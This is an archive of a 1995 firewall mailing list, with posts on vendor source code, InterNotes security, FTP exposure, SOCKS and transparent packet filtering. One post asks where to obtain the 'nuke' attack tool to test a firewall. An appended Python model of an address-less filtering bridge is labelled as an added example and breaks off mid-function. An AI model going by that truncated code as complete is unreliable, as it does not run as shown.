For example, automobile owners often modify cars and add or change numerous accessories, and dealers and mechanics manage to survive. The main difference seems to be the intangible nature of software versus other products --- it's easy to see the aftermarket stereo in a car, but harder to notice the rebuilt RPC library.

Unless a software system is *SO* difficult to modify that it is not worth the effort of doing so, I doubt that customers will ever be deterred in their attempts both to "improve" a product or tailor it to their particular needs. Vendors will just have to live with that possibility. Don't get me wrong: I'm not suggesting that vendors should be required to support unauthorized modifications any more than I would expect a car dealer to repair under warranty a non-dealer or non-factory option. Maybe I'm just a bit unique, but I'm willing to live with the consequences of what *I* do.

Frank

-- "Outside of a dog, a book is a man's best friend; inside of a dog, it's too dark to read." -- Groucho Marx

From firewalls-owner Mon May 1 10:12:56 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id IAA02890 for firewalls-outgoing; Mon, 1 May 1995 08:11:37 -0700 Received: from grauna.ax.apc.org ([200.18.178.11]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id IAA02883 for ; Mon, 1 May 1995 08:11:28 -0700 Received: from ax.ibase.org.br ([200.18.178.1]) by grauna.ax.apc.org (8.6.11/Revision: 1.58 ) with SMTP id MAA20773 for ; Mon, 1 May 1995 12:12:04 -0300 Received: (from uuboemia) by ax.ibase.org.br (8.6.11/Revision: 1.180 ) id MAA05512 for firewalls@greatcircle.com; Mon, 1 May 1995 12:06:28 -0300
From: Fernando Cabral
To: njb@csehost.knoware.nl, firewalls@greatcircle.com
Subject: Re: Firewalls mailing list in French: interest ?
X-Mailer: ScoMail 1.0
Date: Mon, 1 May 1995 11:58:43 -0400 (BRA)
Message-ID: <9505011158.aa12307@boemia.pix.com.br>
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hi

Niels wrote:

[many paragraphs suppressed]

>Alors, ne nous quittez pas, francophones. Ecrivez simplement en francais!
> [So don't leave us, French speakers. Just write in French!]

I agree with him in number, gender and grade.

>Niels

-fernando

Fernando Cabral
PADRAO iX Sistemas Abertos Ltda
Solucoes de Informatica
Caixa Postal 3541
70084-970 Brasilia-DF
+55 61 274-6092 (voice)
+55 61 274-5302 (fax)
boemia!fernando@ibase.br

From firewalls-owner Mon May 1 11:14:05 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA04934 for firewalls-outgoing; Mon, 1 May 1995 09:36:06 -0700 Received: from sgi.sgi.com (SGI.COM [192.48.153.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA04929 for ; Mon, 1 May 1995 09:36:04 -0700 Received: from sgihub.corp.sgi.com by sgi.sgi.com via ESMTP (950405.SGI.8.6.12/910110.SGI) for <@sgi.sgi.com:firewalls@greatcircle.com> id JAA25566; Mon, 1 May 1995 09:36:19 -0700 Received: from beyond.clubfed.sgi.com by sgihub.corp.sgi.com via ESMTP (950413.SGI.8.6.12/911001.SGI) for <@sgi.com:firewalls@greatcircle.com> id JAA12506; Mon, 1 May 1995 09:36:17 -0700 Received: from bruiser.clubfed.sgi.com by beyond.clubfed.sgi.com via ESMTP (940816.SGI.8.6.9/911001.SGI) for <@beyond.clubfed.sgi.com:firewalls@greatcircle.com> id MAA15644; Mon, 1 May 1995 12:45:01 -0400 Received: by bruiser.clubfed.sgi.com (940816.SGI.8.6.9/940406.SGI.AUTO) for firewalls@greatcircle.com id MAA18935; Mon, 1 May 1995 12:44:59 -0400
From: "Kwesi O.
Ames" Message-Id: <9505011244.ZM18933@bruiser.clubfed.sgi.com> Date: Mon, 1 May 1995 12:44:48 -0400 X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk unsubsribe -- ------------------------------------------------------------------ "Ask me a question, If I don't know the answer Come back tomorrow and I'll have the answer." ------------------------------------------------------------------ Kwesi '2 Trini' Ames | Internet: koa@clubfed.sgi.com Co-op Sys Admin | Phonenet: 301/572.3255 Silicon Graphics Inc. | Faxnet : 301/572.3280 Silver Spring, MD | Bayonet : Ouch!! ------------------------------------------------------------------ I speak for myself, not my employer. From firewalls-owner Mon May 1 11:17:50 1995 Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05228 for firewalls-outgoing; Mon, 1 May 1995 09:45:55 -0700 Received: from sg543689.eng.chrysler.com (sg543689.eng.chrysler.com [152.116.1.69]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id JAA05223 for ; Mon, 1 May 1995 09:45:51 -0700 Received: from sg5382na.eng.chrysler.com (sg5382na.eng.chrysler.com [152.116.1.30]) by sg543689.eng.chrysler.com (8.6.10/8.6.9) with ESMTP id MAA25787 for ; Mon, 1 May 1995 12:46:11 -0400 Received: from clncrdv1.is.chrysler.com ([129.9.241.19]) by sg5382na.eng.chrysler.com (8.6.10/8.6.9) with SMTP id MAA18190 for ; Mon, 1 May 1995 12:48:27 -0400 Received: from bobsgrid.is.chrysler.com by clncrdv1.is.chrysler.com (4.1/SMI-4.1) id AA09817; Mon, 1 May 95 12:48:58 EDT Message-Id: <9505011648.AA09817@clncrdv1.is.chrysler.com> X-Sender: t3125rm@clncrdv1.is.chrysler.com X-Mailer: Windows Eudora Version 2.0.3 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 01 May 1995 12:45:38 -0400 To: doc@deathstar.lis.cch.com (Matthew J. 
D'Errico), auampwrv@ibmmail.com (Phil Daniels DLSPPJ - AMPLN1)
From: chrysler-is-edi@is.chrysler.com (Robert Moskowitz)
Subject: Re: LOTUS NOTES
Cc: keithw@tp.com, firewalls@greatcircle.com
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 08:23 AM 5/1/95 -0400, Matthew J. D'Errico wrote:

>There's been significant mis-information propagated by Lotus with regard to
>"Firewall" facilities. I say misinformation because they imply very strongly
>that InterNotes will act as a firewall for your Internet activities.
>Outside of the obvious security walls between the Notes facilities and the
>Internet, there's no proof, nor documentation, that InterNotes will provide
>the facilities of a good firewall outside of the Notes realm, i.e.: Bastion
>Host, Packet Filtering, etc.

Not only this... If you run this wonderful InterNotes on a UNIX host that is connected to the INTERNET and you have not secured said UNIX host, guess what? :(

Also they have repeatedly presented me with blank looks every time I bring up a security audit of their CODE. Their reply is that their protocol is secure. :(

I would have a perverted sense of gratification if a SATAN script could open up a UNIX host running only the NOTES code.
Robert Moskowitz
Chrysler Corporation
(810) 758-8212

From firewalls-owner Mon May 1 11:36:56 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id KAA07023 for firewalls-outgoing; Mon, 1 May 1995 10:56:11 -0700 Received: from relay4.UU.NET (relay4.UU.NET [192.48.96.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id KAA07018 for ; Mon, 1 May 1995 10:56:09 -0700 Received: from maestro.Maestro.COM by relay4.UU.NET with SMTP id QQynwh27886; Mon, 1 May 1995 13:56:25 -0400 Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA12126; Mon, 1 May 95 13:51:51 EDT
Date: Mon, 1 May 1995 13:51:50 -0400 (EDT)
From: Sick Puppy
Subject: nuke vs firewalls
To: firewalls@GreatCircle.com
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I would like to run nuke against a firewall and see what the firewall spits out. Unfortunately I don't have nuke. NASIRC knows where to find it but they won't tell. Can anyone tell me where to pick up a copy of nuke?

Sick Puppy the Cat_Eating_Dawg
U.S. Dept.
of InJustice

From firewalls-owner Mon May 1 11:39:36 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id JAA05503 for firewalls-outgoing; Mon, 1 May 1995 09:58:12 -0700 Received: from indy.knoware.nl (indy.knoware.nl [193.78.120.3]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id JAA05497 for ; Mon, 1 May 1995 09:58:01 -0700 Received: from csehost.knoware.nl by indy.knoware.nl (5.64/A/UX-3.00) id AA23508; Mon, 1 May 95 18:01:57 WET DST
Date: Mon, 1 May 95 18:01:57 WET DST
Message-Id: <9505011701.AA23508@indy.knoware.nl>
X-Sender: njb@pop.knoware.nl
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
To: Firewalls@greatcircle.com
From: njb@csehost.knoware.nl (Niels Bjergstrom)
Subject: New Internet Security Division
X-Mailer:
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

NEWS RELEASE - 1995.05.01

Computer Security Engineers, Ltd., today announced the formation of a new division of the company to provide Internet security related services and products in Europe. The new division will be headquartered in the UK and services provided through existing Support Centres in Denmark, Norway, Sweden, Germany, UK, Holland, Belgium and Hungary. Southern Europe will initially be serviced through CSE, Ltd. in the UK.

CSE, Ltd., will provide turnkey firewall setups (hardware, software and expertise), risk analyses and security policies, remote firewall administration and, for those who wish to perform their own firewalling, security auditing.

The company is currently looking for a number of competent regional partners to distribute CSE products and services, especially in Southern Europe.

- ------------------------------------------------------------------------
-- Niels J Bjergstrom, Ph.D., m/ISACA        Tel. +31 70 362 2269     --
-- Computer Security Engineers, Ltd.         Fax.
+31 70 365 2286     --
-- Postbus 85 502, NL-2508 CE Den Haag       London: +44 181 534 7104 --
-- Netherlands                               Email: njb@csehost.knoware.nl --
-- PGP Public key available on request - please use when mailing vira --
------------------------------------------------------------------------

From firewalls-owner Mon May 1 13:42:28 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA09677 for firewalls-outgoing; Mon, 1 May 1995 12:27:43 -0700 Received: from uvs1.orl.mmc.com (uvs1.orl.mmc.com [141.240.192.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id MAA09669 for ; Mon, 1 May 1995 12:27:34 -0700 Received: from TCCSLR.DECnet MAIL11D_V3 by uvs1.orl.mmc.com (5.57/Ultrix3.0-C) id AA04955; Mon, 1 May 95 14:59:21 -0400
Date: Mon, 1 May 95 14:59:21 -0400
Message-Id: <9505011859.AA04955@uvs1.orl.mmc.com>
From: padgett@tccslr.dnet.mmc.com (A. Padgett Peterson, P.E. Information Security)
To: "firewalls@greatcircle.com"@UVS1.dnet.mmc.com
Subject: Source Code
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank writes:

>Even though we include source code with our distribution, I would not suggest
>that anyone make changes. It gets real hard to try to support a product
>and changes as well. I can not guarantee that any changes that are
>made will work in the next version.

This is the best choice IMNSHO. The code is there if necessary (and often is; cannot count the times I have had to make a vendor-suggested patch because the vendor could not duplicate the problem on their equipment), and available for examination (when I have made trouble calls, this has often enabled me to direct the vendor's attention to the specific module giving trouble).

The point is that in a dynamic environment a customer may not be able to wait for the next version and at the same time, the vendor may not have the available resources (equipment and manpower) to be able to recreate it.
Warmly,
Padgett

From firewalls-owner Mon May 1 13:47:48 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id NAA10579 for firewalls-outgoing; Mon, 1 May 1995 13:00:29 -0700 Received: from sstcx1.lanl.gov (sstcx1.lanl.gov [128.165.207.14]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id NAA10574 for ; Mon, 1 May 1995 13:00:26 -0700 Received: (from dneal@localhost) by sstcx1.lanl.gov (8.6.10/8.6.9) id OAA26109 for firewalls@GreatCircle.COM; Mon, 1 May 1995 14:00:45 -0600
Date: Mon, 1 May 1995 14:00:45 -0600
From: David Neal
Message-Id: <199505012000.OAA26109@sstcx1.lanl.gov>
To: firewalls@GreatCircle.COM
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

unsubscribe

From firewalls-owner Mon May 1 13:56:33 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id MAA10101 for firewalls-outgoing; Mon, 1 May 1995 12:45:14 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id MAA10095 for ; Mon, 1 May 1995 12:45:12 -0700 Received: from Disclosure.COM by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id MAA02154; Mon, 1 May 1995 12:44:15 -0700 Received: by Disclosure.COM (4.1/SMI-4.1) id AA11751; Mon, 1 May 95 15:45:36 EDT
Date: Mon, 1 May 1995 15:45:35 -0400 (EDT)
From: Scott Barman
To: Bob McKisson
Cc: ted@gw.lsli.com, Firewalls@greatcircle.com
Subject: RE: TRUST US
In-Reply-To: <9504291846.AA00533@sandfiddler.paragon-systems.com>
Message-Id:
Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Sat, 29 Apr 1995, Bob McKisson wrote:

> Clue; Would you spend years of effort building a company, investing
> time and huge stacks of cash, yours and others, to develop a quality
> software product that the marketplace is telling you that it very much
> wants and needs, and then give it all away?

The GNU Project?
The Open Software Foundation? Oh... but they don't give it away, but they do license it!

scott barman
scott@disclosure.com
(I speak for nobody but myself... sometimes badly!! :-)

From firewalls-owner Mon May 1 15:30:48 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id OAA13180 for firewalls-outgoing; Mon, 1 May 1995 14:14:53 -0700 Received: from gateway.sctc.com (GATEWAY.SCTC.COM [192.55.214.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id OAA13154 for ; Mon, 1 May 1995 14:14:12 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id QAA13297 for ; Mon, 1 May 1995 16:15:17 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 172420000; 1 May 95 17:14 CDT Received: from sctc.com by sccmailhost.sctc.com id 154770000; 1 May 95 17:13 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id QAA29409; Mon, 1 May 1995 16:13:46 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id QAA17297; Mon, 1 May 1995 16:13:44 -0500
Date: Mon, 1 May 1995 16:13:44 -0500
From: Rick Smith
Message-Id: <199505012113.QAA17297@shade.sctc.com>
To: firewalls@greatcircle.com
Cc: smith@sctc.com
Subject: Re: some remarks on the source and what it buys you -
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Regarding:

>THIS IS WHAT I WANT: Let me get the code under NDA. If you are a real
>manufacturer, you won't mind giving me your test results and explaining
>precisely how your system works. Build your lower level simply; create a
>higher level architecture for me to become familiar with. And please,
>please, don't waste my time.

There is one more question to ask: how well does the vendor's bugfixing and revision management work?
In other words, does the vendor track bug fixing, associate fixes with releases, and exercise a reasonable measure of review and control over their code? What about regression testing? If there isn't much control over the revision process, then it's a waste of time to review their code, since there's nothing that controls what it'll look like the next time they update it.

A cadre of True Paranoids in the military INFOSEC community had once proposed that high security systems should comply with the strategic defense system's requirements for high assurance software. That required that you use (nonexistent) high assurance software tools to implement high assurance operating systems to host those tools on. But besides that, it also required QA things like source code control, change reviews, regression testing, etc.

We dropped some of the more esoteric assurance requirements when doing Sidewinder (i.e. no mathematical specifications), but we still do configuration management and bug tracking and release control. This is what responsible engineering is all about.

Rick.
smith@sctc.com roseville, minnesota

From firewalls-owner Mon May 1 15:39:20 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15212 for firewalls-outgoing; Mon, 1 May 1995 15:15:13 -0700 Received: from teal.csn.org (teal.csn.net [199.117.27.22]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id PAA15207 for ; Mon, 1 May 1995 15:15:09 -0700 Received: by teal.csn.org id AA19834 (5.65c/IDA-1.5 for Firewalls@GreatCircle.COM); Mon, 1 May 1995 16:15:30 -0600
Date: Mon, 1 May 1995 16:15:30 -0600
From: Scott Surguine
Message-Id: <199505012215.AA19834@teal.csn.org>
To: Firewalls@greatcircle.com
Subject: TIS and other "Off The Shelf Packages"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Greetings Folks:

I am currently interested in knowledge of TIS & Other packages that are currently available on the market. Where might I get a list of such information?
TIA,
Scott A. Surguine
surguine@csn.org

From firewalls-owner Mon May 1 16:13:11 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id PAA15711 for firewalls-outgoing; Mon, 1 May 1995 15:31:41 -0700 Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id PAA15703 for ; Mon, 1 May 1995 15:31:38 -0700 Received: from gateway.sctc.com by mycroft.GreatCircle.COM (8.6.10/SMI-4.1/Brent-950108) id PAA02883; Mon, 1 May 1995 15:30:33 -0700 Received: from sccmailhost.sctc.com (sccmailhost.sctc.com [192.55.214.100]) by gateway.sctc.com (8.6.10/8.6.9) with SMTP id RAA14151 for ; Mon, 1 May 1995 17:30:37 -0500 Received: from sccmailhost.sctc.com by sccmailhost.sctc.com id 178580000; 1 May 95 18:29 CDT Received: from sctc.com by sccmailhost.sctc.com id 159870000; 1 May 95 18:29 CDT Received: from shade.sctc.com (shade.sctc.com [172.17.192.48]) by spirit.sctc.com (8.6.12/8.6.9) with ESMTP id RAA01319; Mon, 1 May 1995 17:29:22 -0500 Received: (from smith@localhost) by shade.sctc.com (8.6.12/8.6.9) id RAA19042; Mon, 1 May 1995 17:29:21 -0500
From: Rick Smith
Message-Id: <199505012229.RAA19042@shade.sctc.com>
Subject: Re: TRUST US and other hooui
To: firewalls@greatcircle.com
Date: Mon, 1 May 1995 17:29:21 -0500 (CDT)
Cc: Rick Smith
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 2231
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Frank Wortner says:

>> ... how could we be expected to support a product when we don't know
>> what changes to the code the customer has made?

>A problem, but one that is hardly unique to your product, or in fact to
>the computer industry. For example, automobile owners often modify cars
>and add or change numerous accessories, and dealers and mechanics manage
>to survive.
>The main difference seems to be the intangible nature of
>software versus other products --- it's easy to see the aftermarket
>stereo in a car, but harder to notice the rebuilt RPC library.

I think the problem with software is that the side effects of changes are much, much harder to predict and control. People can install aftermarket stereos because cars and stereos have reached a level of technological maturity in which *most* of the problems have been anticipated and designed out of this scenario. A properly installed stereo isn't going to blow the fuses or drain the battery. Also, the most likely failure modes decrease your enjoyment of your car but are unlikely to risk your life and safety.

On the other hand, there is No Way to anticipate the side effects of arbitrary changes to source code, especially in security software. In fact, history has shown that it's much easier to implement software with security flaws than without security flaws, even when security is your objective. If you're making these changes as an independent third party with no involvement in the software's design, you run an even better chance of trampling on some key assumption and opening a hole.

The original purpose of type enforcement was to so restrict the behavior of separate software components that we could easily analyze their behavior and do formal models of each component. We don't do that on Sidewinder, but we do use type enforcement to restrict process behavior (like chroot, but more flexibly and thoroughly). In practice we use this to restrict the potential risks of installing the latest "improved" version of sendmail, though someday we'll probably use it to allow controlled local modifications, too.

Rick.
smith@sctc.com roseville, minnesota

From firewalls-owner Mon May 1 16:39:54 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id QAA17148 for firewalls-outgoing; Mon, 1 May 1995 16:11:05 -0700 Received: from BCSC02.GOV.BC.CA (BCSC02.GOV.BC.CA [142.32.161.61]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id QAA17139 for ; Mon, 1 May 1995 16:11:00 -0700 Message-Id: <199505012311.QAA17139@miles.greatcircle.com> Received: from BCSC02.GOV.BC.CA by BCSC02.GOV.BC.CA (IBM VM SMTP V2R2) with BSMTP id 0204; Mon, 01 May 95 16:13:54 PDT
Date: Mon, 1 May 95 16:13:54 PDT
From: "Sam van der Merwe"
To: Firewalls@GreatCircle.COM
Subject: Novell FTP - Need a Firewall?
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

To: FIREWA1 --INTERNET Firewalls@GreatCir

I have an IBM mainframe that is going to transfer a file daily to a Novell 4.1 LAN. After some work is done on the LAN an updated file will be transferred back to the mainframe to be used as input to a batch job. Because we have a TCP/IP network I want to use FTP to transfer the file up and down. This process will have to be automated as the file transfer could take place at any time in the day. There is a Cisco router on the LAN side.

What I would like to know:

- If I fire up an FTP server with NO anonymous FTP are there any security implications I should worry about? - we currently use the same network to access the Internet. Assume no security exists around this FTP server or the process currently.
Sam van der Merwe
Senior Security Supervisor
Information Technology Division, Motor Vehicle Branch
Phone: 356-5281
INTERNET: SSVANDER@BCSC02.GOV.BC.CA

From firewalls-owner Mon May 1 17:09:10 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id RAA18785 for firewalls-outgoing; Mon, 1 May 1995 17:00:19 -0700 Received: from wyrm.cc.uow.edu.au (wyrm.cc.uow.edu.au [130.130.68.1]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id RAA18774 for ; Mon, 1 May 1995 17:00:14 -0700 Received: from wumpus.cc.uow.edu.au (wumpus [130.130.68.6]) by wyrm.cc.uow.edu.au (8.6.11/8.6.11) with ESMTP id JAA18896 for ; Tue, 2 May 1995 09:57:13 +1000
From: LEI YI T
Received: (tyl11@localhost) by wumpus.cc.uow.edu.au (8.6.9/8.6.4) id JAA09064 for firewalls@GreatCircle.COM; Tue, 2 May 1995 09:57:11 +1000
Message-Id: <199505012357.JAA09064@wumpus.cc.uow.edu.au>
Subject: What's about SOCKS??
To: firewalls@GreatCircle.COM
Date: Tue, 2 May 1995 09:57:10 +1000 (EST)
X-Mailer: ELM [version 2.4 PL24]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 420
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

G'day all,

I have installed the TIS's firewall into our system ( Solaris x86 PC with 2 ethernet interfaces ). Everything seems to be working fine, and we want to configure transparent control of services (eg telnet ) between two networks. We believe SOCKS does this. Can anyone tell me about SOCKS and where to find it, or anything else that does the same thing.
Thanks in advance,
Yitao
tyl11@wumpus.uow.edu.au

From firewalls-owner Mon May 1 21:13:52 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id VAA23488 for firewalls-outgoing; Mon, 1 May 1995 21:01:59 -0700 Received: from UABDPO.DPO.UAB.EDU (UABDPO.DPO.UAB.EDU [138.26.1.10]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with SMTP id VAA23483 for ; Mon, 1 May 1995 21:01:55 -0700 Message-Id: <199505020401.VAA23483@miles.greatcircle.com> Received: from [164.111.129.58] by UABDPO.DPO.UAB.EDU (IBM VM SMTP V2R2) with TCP; Mon, 01 May 95 23:02:21 CDT
Date: Mon, 1 May 1995 23:14:30 -0600
To: firewalls@greatcircle.com
From: usts062@maze.dpo.uab.edu (Christopher Smith)
X-Sender: usts062@uabdpo.dpo.uab.edu
Subject: Re: some remarks on the source and what it buys you -
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

At 4:13 PM 5/1/95 -0500, Rick Smith wrote:

>There is one more question to ask: how well does the vendor's
>bugfixing and revision management work? In other words, does the
>vendor track bug fixing, associate fixes with releases, and exercise a
>reasonable measure of review and control over their code? What

>A cadre of True Paranoids in the military INFOSEC community had once
>proposed that high security systems should comply with the strategic
>defense system's requirements for high assurance software. That
>required that you use (nonexistent) high assurance software tools to
>implement high assurance operating systems to host those tools on. But
>besides that, it also required QA things like source code control,
>change reviews, regression testing, etc.

Does this mean that for these guys, everything had to be assured? Instead of falling back on a simplistic well-defined layer, they used the brute force approach? How was Sidewinder structured?
From firewalls-owner Tue May 2 04:09:57 1995
Received: (daemon@localhost) by miles.greatcircle.com (8.6.9/Miles-950430-1) id DAA02038 for firewalls-outgoing; Tue, 2 May 1995 03:50:57 -0700 Received: from chx400.switch.ch (chx400.switch.ch [130.59.1.2]) by miles.greatcircle.com (8.6.9/Miles-950430-1) with ESMTP id DAA02025 for ; Tue, 2 May 1995 03:50:39 -0700 Received: from arwen.unibe.ch by chx400.switch.ch with SMTP (PP); Tue, 2 May 1995 12:50:34 +0200
From: greulich@math-stat.unibe.ch (Andreas Greulich)
Message-Id: <9505021050.AA02076@grimsel>
Subject: completely transparent filtering device?
To: firewalls@greatcircle.com
Date: Tue, 2 May 1995 12:50:27 +0200 (MET DST)
X-Mailer: ELM [version 2.4 PL23]
Content-Type: text
Content-Length: 4384
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Hello all!

We got a problem concerning a packet-filtering device. There's a subnet connected to our TCP-IP based network that wants to protect itself from our network. The best thing of course would be a firewall, the easiest thing a packet-filtering router (only packet-filtering would actually be needed in the given situation). The subnet is connected to the main network via a router administered by us.

The problem is that most technically good/feasible solutions are impossible for political reasons:

- Adding access lists to the existing router isn't acceptable for them (they don't trust us to set up the rules correctly).
- Adding a second router between our router and their subnet isn't acceptable to us (or, let's say, to the people that take care of the network) with the (admittedly stupid) argumentation that they won't assign a new subnet (the subnet between the two routers). Don't ask me why not; there are no technical, but just political reasons speaking against it. They just won't do it.
I see two solutions for the moment (note that the subnet isn't partitioned, i.e. no further routers are in it, it is just bridged):

1. Using a standard firewall with the existing router as screening router (this would allow setting up easy rules, and maybe that's acceptable to them; it also splits configuration between router and firewall).
2. Actually only packet filtering would be required, not the full overhead of a firewall. Hence we thought about a 2-port machine that's put on the wire between our router and their network, but without ANY routing features. If no subnet has to be assigned between router and this device, the argument given above wouldn't work anymore.

The first solution surely is feasible. My question aims at the second solution.

What I look for is a device that actually has none of its two ip interfaces configured to an ip address or subnet or anything like this; this device would just receive ethernet frames from one side, send it thru some filtering mechanism, and based upon a yes-no decision sends it unchanged to the other interface, and vice versa. This way it would be completely invisible. It would also (assuming the filtering rules allow that) let ARP/RARP packets and the like pass unchanged. To make this work, it would have to be able to send out ethernet frames with ethernet addresses different from its own (i.e. spoof them, which usually isn't possible). I don't think such a device or program exists? If so, I'd like to know about it...

What would technically be possible though is a device that deals with ARP/RARP specifically, because a device usually can only use its real ethernet address as source ethernet address. To make the transparent setup work, it would have to do proxy ARP on behalf of all directly connected devices on either side of the machine.
That would be easy; it would just have to reply to any ARP request with its own ethernet address (as no diskless clients are booted over this router, it is OK not to translate RARPs, but of course this could also be done using fixed tables). If ARP is dealt with like this, it would for example be possible to write a program that runs the interfaces in promiscuous mode, say on a Sun using the nit interface, and just copies packets from one interface to the other and vice versa (with the filter in between). It wouldn't even be necessary to have the interfaces set up with correct addresses, as nit doesn't use them. But such a program would be slow (maybe faster using dlpi...). Does such a program (but faster, maybe in kernel) exist for some hardware, or maybe some hardware devices?

The important thing is, it has to be transparent, with no need to set up subnets and the like... It seems like a terribly easy thing, but of course "too easy" if one has to deal with the overhead of an operating system like Unix on top...

Thanks for your help in advance,
Andy

--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Andreas Greulich, University of Berne, Switzerland
Email: greulich@math-stat.unibe.ch, greulich@iam.unibe.ch
http://grimsel.unibe.ch/~greulich
CIS: 100014,1033
Phone home: (+41 31) 961 7031
Phone office: (+41 31) 631 8809, (+41 31) 631 4869
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
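The two-port, address-less filter Andy sketches (frames read from one side, a yes/no rule applied, the frame copied unchanged to the other side, ARP/RARP let through) modelled in Python as an added example that is not part of the original post. The frames, MAC/IP addresses and rule set are constructed for the demo, and the raw nit/DLPI frame I/O the real device would need is replaced by plain function calls.

```python
"""Model of an 'invisible' two-port packet filter: no IP address on either
interface, frames copied byte-for-byte from one side to the other when a
yes/no rule says so, ARP/RARP always passed so hosts on both sides can still
resolve each other. Added example; frames, addresses and rules are constructed."""
import struct

ETH_IP, ETH_ARP, ETH_RARP = 0x0800, 0x0806, 0x8035
PROTO_TCP, PROTO_UDP = 6, 17

# Constructed locally administered MACs for the two demo hosts.
INSIDE_MAC = b"\x02\x00\x00\x00\x00\x01"    # host on the protected subnet
OUTSIDE_MAC = b"\x02\x00\x00\x00\x00\x02"   # host on the main network


def parse_frame(frame: bytes) -> dict:
    """Decode the Ethernet II header and, for IPv4, the fields a filter needs."""
    if len(frame) < 14:
        raise ValueError("short Ethernet frame")
    info = {"dst_mac": frame[:6], "src_mac": frame[6:12],
            "ethertype": struct.unpack("!H", frame[12:14])[0]}
    if info["ethertype"] != ETH_IP:
        return info                      # ARP/RARP/other: L2 fields are enough
    ip = frame[14:]
    if len(ip) < 20 or ip[0] >> 4 != 4:
        raise ValueError("bad IPv4 header")
    ihl = (ip[0] & 0x0F) * 4
    info["proto"] = ip[9]
    info["src_ip"] = ".".join(map(str, ip[12:16]))
    info["dst_ip"] = ".".join(map(str, ip[16:20]))
    l4 = ip[ihl:]
    if info["proto"] in (PROTO_TCP, PROTO_UDP) and len(l4) >= 4:
        info["sport"], info["dport"] = struct.unpack("!HH", l4[:4])
    return info


class TransparentFilter:
    """Ports 'inside' (their subnet) and 'outside' (our network). A rule is
    (arrival_port or '*', ip_proto or None, dport or None, verdict); first
    match wins, anything unmatched gets the default verdict."""

    def __init__(self, rules, default="drop"):
        self.rules, self.default = rules, default

    def verdict(self, arrived_on: str, info: dict) -> str:
        # The box has no address to answer ARP with, so ARP/RARP must pass
        # untouched or hosts on either side cannot reach each other at all.
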